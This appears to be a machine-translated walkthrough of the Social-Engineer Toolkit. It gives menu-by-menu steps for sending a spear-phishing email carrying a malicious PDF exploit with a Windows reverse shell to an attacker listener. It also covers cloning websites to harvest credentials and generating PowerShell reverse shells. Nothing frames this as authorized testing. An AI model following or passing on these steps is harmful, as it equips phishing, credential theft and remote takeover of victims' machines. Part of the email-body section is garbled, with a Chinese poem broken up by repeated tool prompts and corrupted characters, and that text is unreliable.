SET(Social-Engineer Toolkit)
Open source social engineering utilization kit, usually combined with metasploit to use
Github: https://github.com/trustedsec/ptf to update all your tools
Enter kali input
setoolkit
We select the first item from the main menu just now and enter the social engineering Attack
1. Sperar-Phishing Attack
We choose the No. 1 attack, which is a phishing attack
set> 1
The Spearphishing module allows you to specially craft email messages and send
them to a large (or small) number of people with attached fileformat malicious
payloads. If you want to spoof your email address, be sure "Sendmail" is in-
stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF
flag to SENDMAIL=ON.
There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!
1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template
99) Return to Main Menu
set:phishing>
You can see that there are three options
1) Perform a Mass Email Attack mass-mailing attacks
2) Create a FileFormat Payload create a file format payload
3) Create a Social-Engineering Template to create a template of social engineering
We then choose the second option
set:phishing>2
/usr/share/metasploit-framework/
Select the file format exploit you want.
The default is the PDF embedded EXE.
********** PAYLOADS **********
1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2) SET Custom Written Document UNC LM SMB Capture Attack
3) MS15-100 Microsoft Windows Media Center MCL Vulnerability
4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
7) Adobe Flash Player "Button" Remote Code Execution
8) Adobe CoolType SING Table "uniqueName" Overflow
9) Adobe Flash Player "newfunction" Invalid Pointer Use
10) Adobe Collab.collectEmailInfo Buffer Overflow
11) Adobe Collab.getIcon Buffer Overflow
12) Adobe JBIG2Decode Memory Corruption Exploit
13) Adobe PDF Embedded EXE Social Engineering
14) Adobe util.printf() Buffer Overflow
15) Custom EXE to VBA (sent via RAR) (RAR required)
16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
17) Adobe PDF Embedded EXE Social Engineering (NOJS)
18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
19) Apple QuickTime PICT PnSize Buffer Overflow
20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
21) Adobe Reader u3D Memory Corruption Vulnerability
22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)
set:payloads>
The above means:
Choose the file format vulnerability you want.
The default is PDF embedded EXE.
********** Payload **********
Set custom-written DLL hijacking attack vector (RAR, ZIP)
2) Set custom-written document UNC LM SMB capture attack
3) MS15-100 Microsoft Windows Media Center MCL vulnerability
4) MS14-017 Microsoft Word RTF object confusion (2014-04-01)
5) Microsoft Windows CreateSizedDIBSECTION stack buffer overflow
Microsoft Word RTF pFragments stack buffer overflow vulnerability (MS10-087)
7 ) Adobe Flash Player "button" remote code execution
8) Adobe CoolType
We choose the third payload, which will let you choose the connection method
set:payloads>3
1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker
2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system
7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
Here we choose the 4th windows 64-bit tcp bounce connection
set:payloads>4
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.200.41]:
set:payloads> Port to connect back on [443]:
[-] Defaulting to port 443...
[*] All good! The directories were created.
[-] Generating fileformat exploit...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
Next, you will be asked to enter the listening address, usually we should enter the public network IP, so that we can monitor the external network, but here is the simulated ip instead of kali.
After waiting for a while, our payload is ready. There are two options. The first is to keep the current name, and the second is to rename.
We choose the second
set:phishing>2
set:phishing> New filename:helloword.pdf
Next, there are two options, let us choose whether to send an email or group emails, here we choose the first option
set:phishing>1
There are two options here: 1. Pre-defined templates 2. One-time use email templates
We choose the 2nd
set:phishing>2
set:phishing> Subject of the email:
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:
Then let us type the content of the email, whether it is html or plain text, we choose p, and then enter a piece of content
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:p
set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:
Next line of the body: 君不见黄河之水天上来,奔流到海不复回。
君不见高堂明镜悲白发,朝如青丝暮成雪。
人生得意须尽欢,莫使金樽空对月。
天生我材必有用,千金散尽还复来。
烹羊宰牛且为乐,会须䷎ext line of the body: 饮三百Next line of the body: Next line of the body: Next line of the body: 杯。
岑夫子,丹丘生,将进酒,杯莫停。
与君歌一曲,请君为我倾耳听。(倾耳听 一作:侧耳听)
钟鼓馔玉不足贵,但愿长醉不愿醒。(不足贵 一作:何足贵;不愿醒 一作:不复醒)
古来圣Next line of the body: 贤皆宎ext line of the body: Next line of the body: Next line of the body: 寞,惟有饮者留其名。(古来 一作:自古;惟 通:唯)
陈王昔时宴平乐,斗酒十千恣欢谑。
主人何为言少钱,径须沽取对君酌。
五花马、千金裘,呼儿将出换美酒,与尔同销万古愁。
Next line of the body: Next line of the body: Next line of the body: Next line of the body:
Press ctrl+c to end, and then enter the email address to send
set:phishing> Send email to:[email protected]
Next, let's set up the account for sending the email. The first item is gmail, the second item is to choose your own other mailbox, but the second item needs to be configured with smtp
set:phishing>1
set:phishing> Your gmail email address:[email protected]
set:phishing> The FROM NAME user will see:
There is nothing to say next, just follow the prompts.
2. Website Attrack
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method
We choose the first
set:webattack>1
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
We choose the second one, then let us enter the ip address
set:webattack>2
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.200.41]:
Then let us use which way to do
1. Make my own self-signed certificate applet.
2. Use the applet built in SET.
3. I have my own code signing certificate or applet
We choose 2, and then let us choose the cloned URL
set:webattack> Enter the url to clone:
After entering the URL, let us choose the shell's interactive mode
Then we choose the first
then
Sometimes it will be unsuccessful, this is because there are restrictions: the other party’s system runs the java browser program
Next, we will engage in an authentication collection attack
We choose 3
Choice 2
Then we can receive any data the user enters on the phishing page
Let's do another multiple attack method
The so-called multiple attack means that you can choose a variety of attack methods.
From the website attack directory, press 6 to enter the multi-attack, enter some parameters and enter this
In fact, it's just a lot of work together, so I won't demonstrate it here.
3. Wireless Access Point Attack
1. Need a wireless network card
2. The virtual machine needs USB wireless network card support
3. Need to turn on dns hijacking
4. QRCode Generator Attack
The QR code attack provides the function of generating a QR code based on the URL, and the connection content needs to be constructed by yourself
5.Powershell Attack (Powershell Attack)
Utilize the power shell function of windows system
The lower version of the Windows operating system cannot run powershell
Go here for the basics of powershell
https://mp.weixin.qq.com/s/LR6OL_mARk6YBHcZAbKY3Q
We select item 9, enter the monitoring IP address, and port number, then generate powershell, send powershell to the monitored host, select yes to start monitoring
Run ps1 type files on the target host
The kali monitoring page bounced out of the shell
Several other attacks will not be demonstrated here, if you are interested, you can try it yourself